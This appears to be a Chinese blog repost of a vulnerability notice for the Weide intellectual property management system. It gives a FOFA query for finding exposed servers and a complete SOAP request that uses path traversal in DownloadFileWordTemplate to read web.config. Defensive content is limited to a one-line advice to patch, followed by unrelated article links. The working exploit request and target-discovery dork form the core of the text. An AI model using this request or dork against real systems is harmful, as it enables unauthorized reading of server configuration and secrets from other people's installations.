当前位置：首页 > article >正文

唯徳知识产权管理系统 UploadFileWordTemplate 任意文件读取

article 2024/11/13 9:03:12

0x01 漏洞描述：

唯徳于2014年成立，是专业提供企业、代理机构知识产权管理软件供应商，某公司凭借领先的技术实力和深厚的专利行业积累，产品自上市推广以来，已为1000多家企业及代理机构提供持续稳定的软件服务。其知识产权系统DownloadFileWord**存在任意文件读取漏洞

0x02 搜索语句：

Fofa:body="JSCOMM/language.js"

0x03 漏洞复现：

POST /AutoUpdate/WSFM.asmx HTTP/1.1
Host: your-ip
Content-Type: text/xml; charset=utf-8
Content-Length: length
SOAPAction: "http://tempuri.org/DownloadFileWordTemplate"

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <DownloadFileWordTemplate xmlns="http://tempuri.org/">
      <fileName>../../web.config</fileName>
    </DownloadFileWordTemplate>
  </soap:Body>
</soap:Envelope>

读取web.conf后响应体数据做了base64编码解码后数据如下

0x04 修复建议：

厂商已发布补丁请及时修复

http://www.kler.cn/a/311467.html

相关文章：

LLMs之MindFormers：基于国产硬件华为Atlas针对GLM-4-9B实现模型全参微调(单机8卡)→模型推理(单卡多batch推理)

Vue自定义指令详解——以若依框架中封装指令为例分析

今天给在家介绍一篇基于jsp的旅游网站设计与实现

飞凌嵌入式FET527N-C核心板现已适配Android 13

ssm092基于Tomcat技术的车库智能管理平台+jsp(论文+源码)_kaic

nodeJS程序如何引入依赖包

开源项目 GAN 漫画风格化 UGATIT

如何借助项目管理系统实现审批流程的自动化与标准化？

无人机 PX4 飞控 | EKF 使用传感器汇总与添加传感器方法

Photoshop使用方法大全

Zookeeper工作机制和特点

软件验收测试报告模版分享?专业软件验收测试公司推荐

如何安装和注册 GitLab Runner

【STM32系统】基于STM32设计的SD卡数据读取与上位机显示系统（SDIO接口驱动、雷龙SD卡）——文末资料下载

单片机，传感器等低功耗管理

模块化编程：构建灵活与高效的系统

python简介

L67 【哈工大_操作系统】操作系统历史学习任务

spring MVC基础注解汇总

js取出一个对象中指定的字段（封装公共方法）

Redis 哨兵模式配置教程

docker在基础镜像上，比如rockylinux，如何配置yum仓库

AD域控服务器

Ubuntu22.04关闭631端口的方法

Java项目实战II基于Java+Spring Boot+MySQL的酒店客房管理系统(源码+数据库+文档)

Spring Controller